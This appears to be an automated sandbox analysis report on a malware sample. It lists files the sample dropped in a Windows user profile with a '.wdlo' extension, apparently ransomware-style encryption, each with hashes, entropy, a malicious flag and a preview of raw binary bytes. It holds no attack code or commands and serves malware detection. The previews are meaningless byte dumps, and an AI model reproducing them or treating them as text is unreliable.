                  MD5:D08A3022FFD6B0DC57C39558E323F11B
                  SHA1:C6B277D8C2DE1DEC5096ACD712126F75E4726C1A
                  SHA-256:F8424AB023FADC215DAB62536A1773044E3CD7ADC2903A23E68F23F46D9E8EDE
                  SHA-512:0A66F55D8C12201F211989F8D87430ECCD4420C6B84DE8FE60D52C1A0E29B29D19766E0BA62EF308E6E0F9DB10D19D8A4DE7650D7827A34C5D50A267EF05D8BD
                  Malicious:false
                  Preview:...?....e.@..\...(....!'yh.+_. ..W#.#U#.#B_?q./.].B\'.F....z|...q.<..i........5.v.cd.\..M..J......2....e*.X.a..2....nW..t.^..FT../t&.{p.^J.F^.Q."&.H:.|.<...}G...E1.U......L.*p.~2.iv...#....khF~2yI.....iS..LpB..z...NT......K.8..d..{....J....7.....<~+..t..B..9.q!k..^.D!.(b8r6..Z..!1xK.n...s...)S..\..W.^.....v|...h.[...T.4.r.......u..N...y..X..8..4.......".s..k..t..U.l..0....u.....7...({B.;...D.o....8.Z..z...F...P..2[.*.H.+....m.C..Nm>....GI....5a....v<2.49ub.v+..d3jS..u...&!...?..a.......xU/....,p..Y....o....;||o......7..@.n...2.t....y.W..o..&W%wU.}.?MKl.^... 2....dW,.(|....T......6`......[3..T..g..1x.qY:..6..w`nj.!..X.K".t.......{C..k..6...>1.(..]....A..D....b...s......'..j"...,.[..]..>X.O...v......T.GI....M..&.,....a....E..&.g.J.4..J.I(..R8.u?h......S..a.[....]....)E..4...S...G.5............C.|z...5....}.%2..:....].l.Q)..B...c....).^...:,x8...M.q..`G...F..-jbk..l'...\'bv.V...5 6<ta.....v......f..=....W.R....E(g.d.3.p_....#O.2.6....;uc#+#.~...(y.y

                  C:\Users\jones\Local Settings\Comms\UnistoreDB\USSres00001.jrs.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):3146062
                  Entropy (8bit):0.6706351534722407
                  Encrypted:false
                  SSDEEP:3072:qUn7Je/bmqlxbJ6qgxg+C5kvG0z0KXfriSq9gVwlPY4:H74txb0qgaWvG0zZXjiV6GJY4
                  MD5:AD539BDB58B7BBE3F3FADE3CFCFECD92
                  SHA1:52894C81D70FCABE203932C700829E06016A8DC6
                  SHA-256:91F29064A50A417AF0E52C25513B1B82A545624413047E5BD07911DF605778E9
                  SHA-512:BF0711FA27BD1A5F8AA14CFC97EFDC8CC987533ED6B707A9CE0FCA319A026B10932DA228692E116DE894A8FE5C5AB248D28B7141D4AAF85422066B7030A87EBA
                  Malicious:false
                  Preview:.....;ZK..K1...ad..u@#<@\.._p.+;o..|.. .|....C..w.\...Q[)B;..4?..O7s.a.#3..F....g..K......k~..r^..&...C....o....:.....R.:..1..B.+.c....+9(E..`.U.SS.S..7;.._....2.J......r.a..!..T....5.x...y.U..v..O._..,..w.."9..l.".s:.)..S..[.Nj.....kCu...H.a....4..$..;.+.D..":......fP.l.34......`....q.{.}.....u!z...2v...&,..}...V...]..,L..Bhp..pI.?.?ss.`].I5...M.....K....K.uJ/.....tD..z...r.c.(.D..bd...K.h...:[5.ei..|.l.|.5..Sb....Wjb.p.!...`..]O.\^..3......c.=.x.L....a...H...............Q......<..=^ .W ....T.T^O.....(w.........O....a../....1....A3..h..F.D...0.R...g...)...S...,..{.......>i[..* .N .a:b..q..1..3.M......2S.)ZR...a.@)Z..\..........S.>[.!...........N&....B.7....{*SY.Q.V...r.r....F..F.'..\..6b.Z...P..lmA......Z..2..........J.=.t.O.Q..8...._..x.4.W5..e.g.0~W`.s{X.......h.z...T.E0.e.g*..?#d..o3c.O......#.F.{.!....t.8......u%Php.I.rot.-I.!.9.{6.M%.X..T.z....D..w..E...0..[.].Dd...>J............k.`.Q..:.."...|..>.s>..~/.........V.L.N.

                  C:\Users\jones\Local Settings\Comms\UnistoreDB\USSres00002.jrs.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):3146062
                  Entropy (8bit):0.6705903005140648
                  Encrypted:false
                  SSDEEP:3072:qg+rxaHui6roxMG9bo469MvOckgbENStm34/40kbpt5z6E+IU:qvxa76r0vJo4ROckgwag4wvt5zcIU
                  MD5:79205213CB89A3F577035BA30E786BD3
                  SHA1:D2F804F75351FDB250885865C377ADA88BD94E99
                  SHA-256:9929EAC8D47495C8D8630FD60540667BC2094DD1289C00F548AF8152E564A0D6
                  SHA-512:9F647245C1CDC00C972CFBD78E2DAF98D894DEFB37E6F535C8D8EF1A796F95B5E1642CD7AE51F165823D448CF196EFB851B9F1E21D12B1A8C0870145E2022695
                  Malicious:false
                  Preview:......'.....J.v...s....?k|....w....QR.......<;..+6.`.h?@O8|.......#.,x..4..cG0.y[..X.....~..3...+...\.....q......;.k`Y../>M.O...C[.l...S.{"...z.I*...c4x.(........n.~.....JP..:..........(....&..:{...i.-.n...j.......).,\.]^u.r~\U{.#d..wO....m..SC.y.y.F~*..B.......#..H.........].,.~IZ.......g.>.j6.......C.7E?qw...5.ML.1.2..N....cE.F...E...f....>K.g...?QF.,...O.F.U.{..s....R7.....(.6.%.c..}..SPV.,..^.E..*d.Uu.i..y..w?..q.+..."C"....-gZ...{...B;..{t...c.3.-.......Qn...\.Ti....... ^..].(..9./n............?.5p..?.S...06R7.,z......_.lG.Ls.J.P.KG..".uW...6fNW.0.p..H..r.pX..q.8.:W....n.....(...xh.=...." .wMW..cRU.Q.....BY.4.....YM...Re..|.O-.i....x.~w......ZJf.r.9.e..X....3..y2.].o....%#..V1.'.K...i..%......./....Oy..o>W..b..*{.`.Z..#..%Jg...... .m....b_.....E.}...........].....A.FE.>..S.<....BM=..5oQ...h1..k.R.....p..IV.j..5.U....N.t.8. i....d@......U...q..5...Mv._...j..b...5/....D.qWGF.Hm.p..6.f:ec......$`g].W.5".1.....*b)a..2O...T......1..n..!IZP.?ee.

                  C:\Users\jones\Local Settings\Comms\UnistoreDB\USStmp.jtx.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):3146062
                  Entropy (8bit):0.6706938930452939
                  Encrypted:false
                  SSDEEP:6144:c8Z87SCmChqD7UHULd4PVCucJmoewX8HR:c0cJoIHULd4P9cfZw
                  MD5:AF34F90802245A4D82AF25322A8C9ECA
                  SHA1:8404F72C2987D4BED2F6428CBD5CD9E56874CBAA
                  SHA-256:D1409720BBC8DD678AB29FB2519B63B8E74756D20571F93B12A2619691C459AE
                  SHA-512:79EDB72D4ABF0FD1E6C987DA504E620BF0A6421F75385365CAA40803418B215FCD54B51A1406ECE722AB531C128D96552A23DA856363CFC3938614E3B7F62C9B
                  Malicious:false
                  Preview:......_l.$.1c3#N-.$9cX..o..P#.d..K.i...|.".}!p8g...s...)J.......>B}8.e/.n.&...C....V..A^.o........4>3..".....u.@j....%+..B.Qw..O........V.....>i...G.i..3......].t.!XL....5.Q..?<3...<..~..s...=.....qQ...CW..~..].p.{..9Jw.=u.=..|`.....@......c2s=..O.._s`.n...c.,.b.-.n.0.p...%2.x.|:.z......."8...3.Y.........Q..f....x./...Y.o ....h...^..~0.w.RtU*.\.*..M.....d:3...v..r-.)u.?n..]........L.y....z...F&.Uq...4...7p...1j.....8.t^....U.o...T...._n.0..|\....g.9.,.8.?./...!3:.L0....-...t._`x.....c.......m......M.]...8zK..+..$......-..L._...4.(:u.".g......n!.-g..../....$.{.<n...cz......_Am...x_..)..z.P.h....O..W.G.'..|.f..0.....F.ac.a..X.r..M.<Y)26.....L.........,..!L.I...x.....l@[...n..]..[......>......dw..._...a..~:.&.'.....|.m8.....9XQ.l...f....rc.....f.[.Kp..4...X_Y.1.. .<...L..G.$.|~......BXh.J...xb........{.....*...n..H...s..(y......W.....c..}.Na.._.5:..bC.&Gczr...t<Q...c.x.o....p........M.C..*../...R'...!]m.S...<..d....9|..-...?Ht.#'.<.@8

                  C:\Users\jones\Local Settings\Comms\UnistoreDB\store.jfm.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):16718
                  Entropy (8bit):7.989179240573906
                  Encrypted:false
                  SSDEEP:384:qEqgHt2Gj/ZWShGPwsRMMhGyikbn8Y1PF1XYrsu:8gHnjxZhYMMhdik78Y1PF4su
                  MD5:34FC7B70C9A1FD78CF736865ACF637A6
                  SHA1:8FA1B318D396AF5813DAD507AD3ACEC638E961DC
                  SHA-256:71BFB137CADDF688DE8E68E469D5B1ED9E2D531469AEF45D7905657FE0C004E7
                  SHA-512:61AA271E6DC57C394DB8BE2B875C79FC103EA110B237235B070B2EFBA18B9F3380727852F2A7B577561906BD08EAD575FB6661D9A343273D4A2504A18BED9BF2
                  Malicious:false
                  Preview:..(......2..B..{...L^.q~.7..y..:.y_(f\..b..Pd......r4..*..1...x+..+..wc...3Q..._..)...Vo..w<1v....GT.2..yp..t....#.....Z.G..:.]..d...UWr....4.}P.....b.(.b.^..Y.n..-....f.....Hg......{oN.d.-...W.|.......)...t.v.Q2...b.6.....7..m..4.D...z...>...d..3.D....4e....,..}.s.ly..j.cF.j.hz../.......w...v...vp.......w..[. .".)_]r..n.S...d2..{....{.Zf2....J)!0.....g...~...r1._.N...l....x.Z.......d9t....L..g..@@........Bf......3....O...UV.;#p(....t..?.6........].J.g-..2..F....m.~4...l..2?..2..C,.*.....]Ls....w+H.P.W........p....r.M.[n.. ..ld.....f..N.p......*n.Z.5....s....MqL.w.......UE..Ww...F...._...0...)./k.r.^PC....L?.o.R.i..o../..>.v...8.....%..........wx..6,1).....:..R....#.LAy-.4BA....8......F~<e.iAO...21s..kL....X......rvA...,...4.QW.b..8...........9.....u;.+...N.....|.G.......p.....n.. .EF..o.Fi.Q.R.z....|....?.G.E.*f..z:......r6.H.5.>_T.-.@.....5\3.3.3/.....D+..-.X..T..Q.M..f."u.cX.=..z..8....L]..'....U.....4.J.z.Z...[.gU.3.i...j.

                  C:\Users\jones\Local Settings\Comms\UnistoreDB\store.vol.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):6291790
                  Entropy (8bit):0.7008080264565423
                  Encrypted:false
                  SSDEEP:6144:4zAGiDx6O5c7nv3mqZEf90y2ojFwSa+d+gOrOuWxWk3m+cun4CfYjUfSUXivOYRJ:kwxr5O+qVytR3b0r
                  MD5:0C928EC49579BC96D1B4683737FC36A5
                  SHA1:31B9396AF0754C36B2AA337FBEF28D790CDCF5DC
                  SHA-256:5AD83F1F6BCADB0D5237E87DE547C0AF2EA05E74BC22EB90BE419C9B3EB66C0A
                  SHA-512:4FD990CD02A24A41A55FC88C149CBBE54809739E37BCBE14AC364D9F39577BD790E8163FAC02212B9E8E7F0C4EA376A082CED445E3343F1A48DFBB6334E421B8
                  Malicious:false
                  Preview:... ./...\.......<.B.....Fz\_X.$t.Ci....P.1..........7......l....hl.w.,..v...bG..2....H........8%........IWY{...}-;?GC..2V.FmC+..G/.QU.!.....p.B....0!..0.m..5..E.A.Kfy.......2m.........D.W..B.......43.....6Q...........As....[y..l...Y.9.Yo._....$...[.......kI.\Y.N/.P...G.e..Q...Fx{._..*...C....3..Th(..d."........4..}.@j.|.....f..Y1...Q[. y...<L7.....<E...z.'.7g.......^.i...H.c_.0.W.k......RqL...AA...\...Y...u.......D...aM7.:..*...1{./.+h...)eh._.8.b...../..S`..(7.T.6P.....'...R.._.H.P(;..>q....q...p..A.\J...T.X.....s.[._.X......"..s......<.Cs.q_...g.^..*|._...$...[..`.t..+.....o...C5....dp9._pe.....:+..A_x....E...i...U.".si=E-c.7.......!.m"J.....P.x".1 R....y`.cs..]<.0Q.k%...Q..7..}g.*sZ.'KS.U..O%q.8......P.F.....#K..F...1!E.Pm.M.0...W9w@.V.^.0..~q....=$..A..oo}....."M.`........c..d.......<.P.....%.bZ..j..5,sz5;2..B..../p.p..M..m<N..zO<..M]...]\M4.aCb.0.6...k...lJ....^....\...........*.'0..<`.F....pO.._....w0..Fno..C)I.1.5d..wy..y.>h...P.

                  C:\Users\jones\Local Settings\ConnectedDevicesPlatform\CDPGlobalSettings.cdp.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):5196
                  Entropy (8bit):7.955560806416145
                  Encrypted:false
                  SSDEEP:96:KSTw5dCfumxmoQNufzGqfCr4H2DuyhRyqBqIuXqAMxCJYHaR79CP4Jybaa+:KS85kfumx/QNufzvfC0H2ymlCaXCTFJF
                  MD5:97E5C38AF7C8DA76D46C9AB1DA3ECCEC
                  SHA1:5065E63C0600E062FAACF195C8D644BF5D2407AB
                  SHA-256:A5FE6937E35A6D747CAEE27E9C85DE42FDD8C4E63EC1A3538A82203412258D7C
                  SHA-512:83D7C4B01C0E70C6FE13915E806B9CF0BD68431F63CAC07754549F4AD0A80AE77E1B1F3EDF044AC7533E797A7E18F78AA23491B0BA8BD1E70CBADC6717F6D128
                  Malicious:false
                  Preview:.{..mx..P...%.P.).A..yw.w.&%.H...y.A.&3.+....Hc.$...a...[.....H..)...\c...8S.....~..<g...pi.x3}*.=N<...!R...1=|1......<.H..E._.#..g.Qt.....Wl.|R".1........,.,...P..4........y..P|...9U.(#..X.......D........+&.<.m.:}..)Gq*...f..5;F(.../.>...$(.G.TQpw.r.M...5.. ...zS.G.O.....n...T....:@EYt.,;..W..vyS.......6E......~s...Q ......X.Y.W..#..c|6..]..................C.$..:.q.8...(.z[2...>9.5!=K.8..)........//..n...:..?......3g.&...).R.8..f.O.)..[?O....Mx..j..U>......<.j/.T.>Yp.....B.2..rW.t.g.w4......2...r.}...-...qBz{.^0.R.y...%7K...m......@9s..Kjs-..Isj.H....".~.8...%.i.d..$P.f....../....=G.#Z......-.#.q..~a..zS.GO..7.R.[...6h.Z...sK..oI......Pv...../^(?<.......A\R0....OuP.}v.z>.{..GV...g.Y....91...~.........k`....g.U...H....J/..C.....o..QAs.u.F..b.A.........d\.z6..Oj...T.. ......,.........3Nt.X.../...(./..r.aRd..x.Sc|..e..#....<.Go.>.,.x..".0.U.-.....}..j........;.....'.....<...V=.b...H2.......Z\M...........Ok*=.x7p.... .n.e2...m.Y.!v._..f"..'.

                  C:\Users\jones\Local Settings\ConnectedDevicesPlatform\Connected Devices Platform certificates.sst.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):988
                  Entropy (8bit):7.812992807003746
                  Encrypted:false
                  SSDEEP:24:XEwM3HDSsT8lJyubTBmQroCmzIufW1prDXELRgR5k9aXnhC3zbD:UvDSscYAmQsZMufpW5N43nD
                  MD5:7E3872083312852EED28B4C21A380C8E
                  SHA1:2AECA9AAAC13F496C54FE1B9FA3C6A82397B33A8
                  SHA-256:1ED6A1993BA92DFE4A9F16627D9B10310921D9FD3C14B25BBE554D7AA95460E8
                  SHA-512:48335FB72C34C9A7747A72B787295CD02EA1DF437BFFE3580CF2F0D4606C92440D5368D9E5CC6A32926905B1A27BB7A84282B625ACBC0F1B9707F82867AB0FB8
                  Malicious:false
                  Preview:....C...n....)..F....~..p..\.....L.i;!..1.N.D..7.T..|.C2....5R.u........./...*)8.Hq........`.......G..o:1...d...<. ....."7.g../....L.>...:n.7..&h..[(Y....p.F'._gJ.'..lE...a.......C*Mr../.Z........K:.%..`......s(..).4[....w...<.....,.a..Y...2.......4.{h]}.=,.2.6.....%/.m..e.[eT/'%q .+G..|`...Z...I.^.h{.....Ci..WY....x3tz........@.aF.F...m..Owa.`...p..O..P...5.hn..}.E.[......?[...}I.BN.<G@H>......^..6..Q.%."._m&........y'..h.G.W...w......^..&$....\z.x..1.....`..J=".l.|:.....L.'=...0....,....7..../oO....h..+<".EM.m..P.y..JD....y.Xv...l0.x!R.mq..O..#..W../.a..R.X....?.5b.s.. ......s...S..x..........+......2.I........z......g?.aR.n...D{...;..F.j........./c...:..e.y..(J.8~....b7].H:D.|..lQ.s...J.+....&....-. .=...n._..>...`..........C., ....].p;#R.~...'............!...._....`......\......DA..b..O..x7.x.)'1F..{....."...zB.*=.v..IK...w".E..{.....U..k.gi0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\jones\Local Settings\ConnectedDevicesPlatform\L.jones.cdp.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1302
                  Entropy (8bit):7.826015356486921
                  Encrypted:false
                  SSDEEP:24:PXzmCFcVfR7zifnN26LAYNQjFNuM0hp484q1kcOOrfOQ7v1LgJsuk7kb3zbD:PXzJEZ7WvPkYayjS84dcxOoBuXb3nD
                  MD5:3FEDFDE9082DD71A692C1342613A03AF
                  SHA1:7DACB4031C99D288E3B424317468B537A8378549
                  SHA-256:A7330BE63149E5BFD8C99F90B3BD15FF83AC26B4DDB730A0540CEEB0906C3AC8
                  SHA-512:95435724F5F7023DB4B7ABE142A96D3259351FDC3EDEE68BC42B3BDD2CC78C734382C684AD812B5526B4FA219D0186B368DDBEF2E305C4B243DABD01C478D0B0
                  Malicious:false
                  Preview:.{.=.;9...g.Q.._~.d-.4...].o}p....)..H....;...GSsg.x...}\..L.f:.7.[..).i..8 .O..AW..R..Z...2sg.*,)s....d/..{.Q.9.B..y..>Zm.....J*...+....1..&...-.4.#A...Z..H..0.k..-1.V.F.xx1..2....X.|.@.dg..#.x!.(.C:.Q......z....XC.......M.O.u#....1k.F....L4.9..<._._DT.....}..x.yf8....a....0....l'F...e...fq>......+...3..aZ..(...Y.....WJ.....Le^.....^.z.../....p..'.B..<......S@..........H9.s..McI....I.o...F.~BQ..K..;F.s.Rh..^....3.,...oE[...S.@..z..*..qA..$Z.%.i..V.S.,...!..tdH.3n~_4.K.h.FQK;.nX....:.9.#.b.....`.%Ag...........z.....-..5e......;@............H..*\.rj.]..|..=h^2f..R...ei.I:c....@....."y:cj?..o<..'s.j...U....M"..Y......Cbpa...4..k.zD.*.N.....{.9"WF...$.E).C.E._-?.OE.r....x.....=....Os{...o.......:&.A#.F{6.:$..`..t...!.4,...r..e.(}...O."uJa.W?WB..PJ...O=.....Om.l......!S.9.C.I..6....Z...S$./..(..g.w.2..@.....9.....".*B.H...]..`,c..nf{oy80..x$MA*.y......u.....PP8..[.........s.K;..:....*.4...y^"..L.....:..l{..z....t........6

                  C:\Users\jones\Local Settings\ConnectedDevicesPlatform\L.jones.cdpresource.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):388
                  Entropy (8bit):7.378700843870467
                  Encrypted:false
                  SSDEEP:12:09PSGMd6sNKPumnUuk+KGp9z5MN2CW36Wcii9a:09PJM3YTyuv33zbD
                  MD5:F1743CFF40F40B00159283BB678B6F71
                  SHA1:B0C900089CA82791468A80F46205EABC70BA1F80
                  SHA-256:E6C0A2EE3087654577175778C189EC54BB82AAE2D2AA8C3C64DD77D5F6CDD66A
                  SHA-512:065F44C026D51C26BA58139F47C1AB2B65EFA1BB83C61276CE012E8947CE45BC5ACF5642F8F2CA7428640C82ECC4EC173DBDA6B2418BEC0B1AC41EF52147661B
                  Malicious:false
                  Preview:.{.iW.Q...".1..B...Pz6........z..$.J..o.!y....C^..1.c.qN....X....D....[K.I..O..Tq;i0\b.ZKt`....0h...._@;..z.Un8.._Y.;.....f.....l.a..<2....9OVM..o)+;Y.1.@...U.t.P...r.ts.cy....U.U.*.:.08uP.T..s..<.v0..ah].s.......M..G......]xK(.._.A.....).....@...>....<....j..D..hK......... usZ.[.....:li0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\jones\Local Settings\ConnectedDevicesPlatform\L.jones\ActivitiesCache.db-shm.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):33102
                  Entropy (8bit):7.993269301716131
                  Encrypted:true
                  SSDEEP:768:q+LgO/NfXWgBhv1iyPW6YASo+5NxcSmR6yZl5eTd:q+L/NfXR91iyPW6Yxont5qd
                  MD5:661F3177E1F1C770FA12EF5281ABEB1D
                  SHA1:B72CCD22BAC69139A6B03DAF8C2BCBAC89DB8F31
                  SHA-256:C0EDD034A5773059AD9E95B0151FA99CF3C7FF4544EF61F0642BA3E8A731AABF
                  SHA-512:6C13B7B8178BA9C1B1D546D358F074C07955BA882B462A4FCB7E20EBE7B527F58E941EA8ACAB3EAF04DAF9E36C13DF5535641665AAC36912F228697261089F13
                  Malicious:true
                  Preview:..-..8..^}.T.$...,............<,....1....w.;5........6f.....m.Ne...J...wsB!....HS.].<4m%..x...s..N....D..WH.}.s..>......................z......j]...n.WT/...@..u@@..o'....+.Jd.,P.i....w.U..'...#....E_#....,.....4u%.."GL.r4..;.3 ...8OD..lm..p.F&...^ .6j..q..zM...w_.h.H........$...@.........._S.Kr.....s..Ni.A..N!E7.CKZ...^#.M+....u].8(.<.....'..a.:[..d..0..D..T.;C...8U...{.eCV...<.g..(G...:_...Q...q...h....._.b.Y....[?..g..e....v...|@u..%....f.eD.n.ij;.A..Q..(Y......s.^.._5BD\..*.;P?..t.....R.[.-...c......GL-.j...2.y._wQ\`R...J...'2..M...s.$...}Z%....'.. ..Y...a.....\.jF5....=.....s..(.....y..)..^.......|....(.&$..eZk:..].$jz5.s.&B...s...R-.#...7.N..............$eu............n...O.......%.f.!.P......|A^.....p.._....%.9.......nB..T.4.P..'...a.........W...=..Z>..Tr....NK.=.U.E....?e9cST.*j.......3f.\..s...`<.../X..}.......?!......A.9..0k>2d.Yc.%..8q...........".*.*e.....Q.....B.c..VcI..Q....Ph<#....<e:y=./...e.1h]SlJ.V...%.-0..7-.^l....Z..R.(9+

                  C:\Users\jones\Local Settings\ConnectedDevicesPlatform\L.jones\ActivitiesCache.db.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1048910
                  Entropy (8bit):2.669465418273659
                  Encrypted:false
                  SSDEEP:3072:RhOIORbQufM9KVEkkKNiXXePZkuzy+vlXAVg2vil1w/laBlLZIL1HxQnafujHNAt:q7R0MM8y3FuWCRzq83dI/fxuv6C8n
                  MD5:2A898C2085ED3DB43385939C49D29E2D
                  SHA1:4BACEF5FA7028744C832C428EBCDB64E97D42986
                  SHA-256:429070312F06813614B24EC71C5EDF20D896F5DEB9E4980D6A9AD2B9E6665125
                  SHA-512:37A4D7C74C4A44027EA49391EF147B2E123927BFB76D79236F978F101A590F71AC9C26EDB3D985A9A87991B82690A6FB43C95AF026A4B506D6F467BEF581DBA4
                  Malicious:false
                  Preview:SQLitFK@..+? .....:..K.].K.....F.....B..3.G...v5...F....>.N.s........C...U.-..W;/$...NQS.1gK.A,4.V.$b.f.._..H......{,..C.My.Z.....A.|@j7.....>..vc..(xb..y>.CAQ..dqu!|..X"....|..T..Y......a.z....fz.D6v/.<.....b.~.^c.CF$.f.*.6.'7Xd..t..n+..t.m..5.*.h....^......%....n2.s~.J..'..w.j..j....U.T!%.lj}..z..,z.<....z...c.5.Q.,h...Q{.yG..s.`'t6.Y..CY.k.'...MX`7....vU..|4O#.fy.)WY....n....M.-.....S.....F.....l.#.4.d.........T....{...w_..s.Zp....u.b..R..b.;...k_X.\...+...u..Y,.:Z2D.....~...P...p..x.!3.V...".N.)j.ys......*.,e$./..C..T....*..B.e....../.fi_.I=..R.vZ{...t.u!.y`.....<Q..#.K....|u..4..6R....-.2..g.R..7..4. ...3.&3..I......Z..S....y...p"p;......\b...?...Y;<.=IY.1....!I.,....'.p :.....S.JgpP.1.Z H....|.}.C.|.!pL....Cp....8....4....?P.......>.L^W..*Z!..A.q-.`v.~gcYd..6...+k.c...%.K.[p..A...%.x.".Q..+."B.*1......K.V..$....v.Xk2....J..I.i.U....lM.V.A1<..b..ii.....VT!..,.g...f...<...u,.5..0..{.....&.@.u.}.......+..u....h| ..!.....

                  C:\Users\jones\Local Settings\IconCache.db.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):25803
                  Entropy (8bit):7.992618363136842
                  Encrypted:true
                  SSDEEP:384:Py3sICov3RB78U/IpeJ3bHR+n98WlKNlNzgP0aVr/necv1RZwOR9MI7sZB4yDXYZ:6cI/RBXponm2KTJgPtpWOj7sZBfYZ
                  MD5:8FA2D3E1E916360211D0E79C07AB5DAD
                  SHA1:6BA5C2EA1B1FF65DC390E620475D8A30F0C6F808
                  SHA-256:B69E50C432CE3669E06249B5399B824F8D4B5D83CEB1DC688D375A4F0D7CC1EB
                  SHA-512:598284FF697B2E66C9934A1A08F99DC56F8209A15819D91B78E2B552F21E86808EB99BECF0C74BB158DB30D2E0225C9A038FC61E0AA1A523929D80508F91307F
                  Malicious:true
                  Preview:H...W.{..kp.!#=.\0 .........'z.Q.U..:...3.vc..yK\.c.......o.wF..*........../:..._..g-7?_...l..T....Q......<y4........Dy2.u.2..x.?.s{.....*8...[..6..S6...!|k.\M..*...o.xo...I...(...~...........#...u.a..GA..........iE/... .G.U.I...,jF.4.v*L1........U,v......;..rv..`.14`.....J.t*..s8.....*y.".YA../b.._.@.....a..s.....A....W1>$,-2d.....2..mM/9`|&..%0.....B.Cf.....;....q...j.v..+>H1.f......).+..0..h. +h>........^'|...('...3Mw..."/H..{.....q*........9..I.ih..f........F,..E..\.!~.Q..#Uj..n<^..Ru........:..y.?....4.U..!v{..D..U....H=.....G....z....?~.z......*......l.Z........F`.....l..be...xP.+G\{]..P.....}.a.)..8.N ...^.5u.v..:h....v..g..L.~.%..?;.z.#.R S....R.._C...k...dc.....`;]..Sl.U.^./e*....`...O]jZ]r.+er...<h.h|Yg...D.,.~v.l..M>.E.T..;..}.Y.....[.>Z.7N...b..N"`Z....i8Cqu.....S..O4...pV..)..4.&L..[.f'...kAO..}(.{^d.>.u.o#C@i.Q.3.AXn....M*Bh..r...LSgp.-.?..k....D..S.....g .9....A..&.gzQn......x.:Q...&..c..\.[@.."l*.$s.|}E.4..o.........

                  C:\Users\jones\Local Settings\Microsoft\GameDVR\KnownGameList.bin.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):582670
                  Entropy (8bit):5.268457072685545
                  Encrypted:false
                  SSDEEP:6144:a2TaEwbgAgwuwtvmuBdqNUnL/H/KT8pNbGNPLRdMlduU6/24JB:1TaGV5eqNyLH/KAutubcJB
                  MD5:770B08C79FE522924057EE159DD60803
                  SHA1:0F2A1EE92D9006B237A8A77B9C0A8D10A0DC89DB
                  SHA-256:BA92CD078E842AD24C9819ABD93C7647D94B39949EA5876D05D89504E69C1DB9
                  SHA-512:6D5924EBE3ADA3E8F21004ED618B26D16F3074421AB27E2DE90F2069183647A3B420F82F891BC0A87594321D2F3B9C42ECEBE23E6D11F40F280EC06E1F715C08
                  Malicious:false
                  Preview:...........n.[d.b[bi...".@..X.[me..\....Dx]J\._.~......*......Z.u,w.O?.:...&...{..l..Mnj.........I..`..0..J$%[^.j&{:1.C..;"...5.Su..].:K.O.f~...*..2.k(.%..c.-......z..~....?T...j......zl.........ME#Re.b.}L.....`..._..P.....1.....e"k.X&<....46~j.\b../.d$&...\.%PT.6{....]I.....r.....Z.r..J.v'u.%Ha.........H.G...A..S..[..[9r>....Y..Ri....S/....W.....>,..+_x..v...Qu$.'.h.[s....\.T.A.b3.;...4*...3...._.......f~6. ).@.x 1.~4...9.+u..P..(..DH..8..."u....5Y.y...@.6^...N...W'Fm.\.q..3......?...m]s..m...........;V..l.....2.7`.}..E.......J.{._.?.(....-s.T....>4A;.......M.vF...R.....(.....M...........F..?d.1.R..Ma.Y'.q..j..e....q...Z."."AZ.}....L....Ff.?.Q..].w.2{..o.@P..n}....]Y.:[.^...U.i.E.yQ.n."...u..!/$..T.4.qg..O..$e.F.F..g..x9.n.&.9|Ou.w...>...X.x|..(V.?A.N...v9l3{...B..&..z9.p.2.2S.!.,...+6Y.?...D..D._;.#..XlI..;-.I.7*..;..........,..........'..G..*...e.1h.F...8...Iz.=iN.E..f..._.J...`~X.......q...Q.T7.Wjv.S...9U...G}&..~.KM..}....o..}?.

                  C:\Users\jones\Local Settings\Microsoft\Internet Explorer\brndlog.txt.wdlo (copy)

                  Download File
